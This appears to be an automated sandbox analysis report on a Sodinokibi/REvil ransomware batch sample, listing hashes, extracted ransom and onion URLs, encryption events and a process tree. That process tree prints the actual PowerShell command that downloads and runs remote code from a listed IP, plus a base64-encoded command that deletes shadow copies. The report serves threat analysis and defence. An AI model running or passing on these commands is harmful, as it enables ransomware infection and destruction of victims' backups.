Analysis
-
max time kernel
66s -
max time network
116s -
platform
windows10_x64 -
resource
win10 -
submitted
19-08-2020 22:10
Static task
static1
Behavioral task
behavioral1
Sample
058f5b8d291ac79c2bb7a3f231e3b5d8.bat
Resource
win7
Behavioral task
behavioral2
Sample
058f5b8d291ac79c2bb7a3f231e3b5d8.bat
Resource
win10
General
-
Target
058f5b8d291ac79c2bb7a3f231e3b5d8.bat
-
Size
217B
-
MD5
ac5dca786af1760da0a1d3554009dc33
-
SHA1
983a1634a67dbebf5f835d167ba968f2daf3efb9
-
SHA256
fc1242a015ede6e41e186c71d0d5d545e49007e5a804d178aa7114fad7ecd189
-
SHA512
5eae6e71fa72edefd9a1373baa4add4e9dd9fc6ad2e7410f83fb56b1ec10633b5bf2d296016857c9667564ee1043a9207f7dc8ff0dab8b363598902eb1f8c611
Malware Config
Extracted
http://185.103.242.78/pastes/058f5b8d291ac79c2bb7a3f231e3b5d8
Extracted
C:\s9m06ipi-readme.txt
sodinokibi
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/E699305EEEC93634
http://decryptor.cc/E699305EEEC93634
Signatures
-
Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
-
Blacklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 3 3784 powershell.exe -
Modifies extensions of user files 4 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
powershell.exedescription ioc process File renamed C:\Users\Admin\Pictures\SuspendUnprotect.png => \??\c:\users\admin\pictures\SuspendUnprotect.png.s9m06ipi powershell.exe File opened for modification \??\c:\users\admin\pictures\ClearSubmit.tiff powershell.exe File renamed C:\Users\Admin\Pictures\ConvertFromAssert.tif => \??\c:\users\admin\pictures\ConvertFromAssert.tif.s9m06ipi powershell.exe File renamed C:\Users\Admin\Pictures\ClearSubmit.tiff => \??\c:\users\admin\pictures\ClearSubmit.tiff.s9m06ipi powershell.exe -
Enumerates connected drives 3 TTPs
-
Modifies service 2 TTPs 4 IoCs
Processes:
vssvc.exedescription ioc process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer vssvc.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
powershell.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\0451mc55dg19.bmp" powershell.exe -
Drops file in Program Files directory 31 IoCs
Processes:
powershell.exedescription ioc process File opened for modification \??\c:\program files\ExportReceive.eprtx powershell.exe File opened for modification \??\c:\program files\SkipFormat.gif powershell.exe File opened for modification \??\c:\program files\SplitTest.ini powershell.exe File opened for modification \??\c:\program files\MoveRemove.jpeg powershell.exe File opened for modification \??\c:\program files\UnlockFind.wpl powershell.exe File opened for modification \??\c:\program files\UnblockProtect.mid powershell.exe File opened for modification \??\c:\program files\SwitchSet.001 powershell.exe File opened for modification \??\c:\program files\ApproveNew.html powershell.exe File opened for modification \??\c:\program files\AssertUnlock.potx powershell.exe File opened for modification \??\c:\program files\DenyImport.jpg powershell.exe File opened for modification \??\c:\program files\OutSet.WTV powershell.exe File created \??\c:\program files (x86)\s9m06ipi-readme.txt powershell.exe File opened for modification \??\c:\program files\CompareStop.rm powershell.exe File opened for modification \??\c:\program files\ResolveSearch.xls powershell.exe File opened for modification \??\c:\program files\ConvertToComplete.cr2 powershell.exe File opened for modification \??\c:\program files\LockGroup.zip powershell.exe File opened for modification \??\c:\program files\RepairGroup.png powershell.exe File opened for modification \??\c:\program files\RequestDismount.wmv powershell.exe File opened for modification \??\c:\program files\ShowSave.mp3 powershell.exe File opened for modification \??\c:\program files\StepStart.bmp powershell.exe File opened for modification \??\c:\program files\CompressEdit.rm powershell.exe File opened for modification \??\c:\program files\ConvertFromStart.ttf powershell.exe File opened for modification \??\c:\program files\OpenTest.asx powershell.exe File opened for modification \??\c:\program files\ReadRemove.7z powershell.exe File opened for modification \??\c:\program files\SuspendRename.jfif powershell.exe File opened for modification \??\c:\program files\SuspendUnpublish.zip powershell.exe File opened for modification \??\c:\program files\UndoTest.docm powershell.exe File created \??\c:\program files\s9m06ipi-readme.txt powershell.exe File opened for modification \??\c:\program files\BlockFormat.3gp powershell.exe File opened for modification \??\c:\program files\DebugDismount.contact powershell.exe File opened for modification \??\c:\program files\LimitCompress.nfo powershell.exe -
Suspicious behavior: EnumeratesProcesses 8 IoCs
Processes:
powershell.exepowershell.exepid process 3784 powershell.exe 3784 powershell.exe 3784 powershell.exe 3784 powershell.exe 3784 powershell.exe 3324 powershell.exe 3324 powershell.exe 3324 powershell.exe -
Suspicious use of AdjustPrivilegeToken 7 IoCs
Processes:
powershell.exepowershell.exevssvc.exedescription pid process Token: SeDebugPrivilege 3784 powershell.exe Token: SeDebugPrivilege 3784 powershell.exe Token: SeDebugPrivilege 3324 powershell.exe Token: SeBackupPrivilege 3908 vssvc.exe Token: SeRestorePrivilege 3908 vssvc.exe Token: SeAuditPrivilege 3908 vssvc.exe Token: SeTakeOwnershipPrivilege 3784 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
Processes:
cmd.exepowershell.exedescription pid process target process PID 2728 wrote to memory of 3784 2728 cmd.exe powershell.exe PID 2728 wrote to memory of 3784 2728 cmd.exe powershell.exe PID 2728 wrote to memory of 3784 2728 cmd.exe powershell.exe PID 3784 wrote to memory of 3324 3784 powershell.exe powershell.exe PID 3784 wrote to memory of 3324 3784 powershell.exe powershell.exe PID 3784 wrote to memory of 3324 3784 powershell.exe powershell.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\058f5b8d291ac79c2bb7a3f231e3b5d8.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2728 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/058f5b8d291ac79c2bb7a3f231e3b5d8');Invoke-SFWJRWOSAI;Start-Sleep -s 10000"2⤵
- Blacklisted process makes network request
- Modifies extensions of user files
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3784 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3324
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Modifies service
- Suspicious use of AdjustPrivilegeToken
PID:3908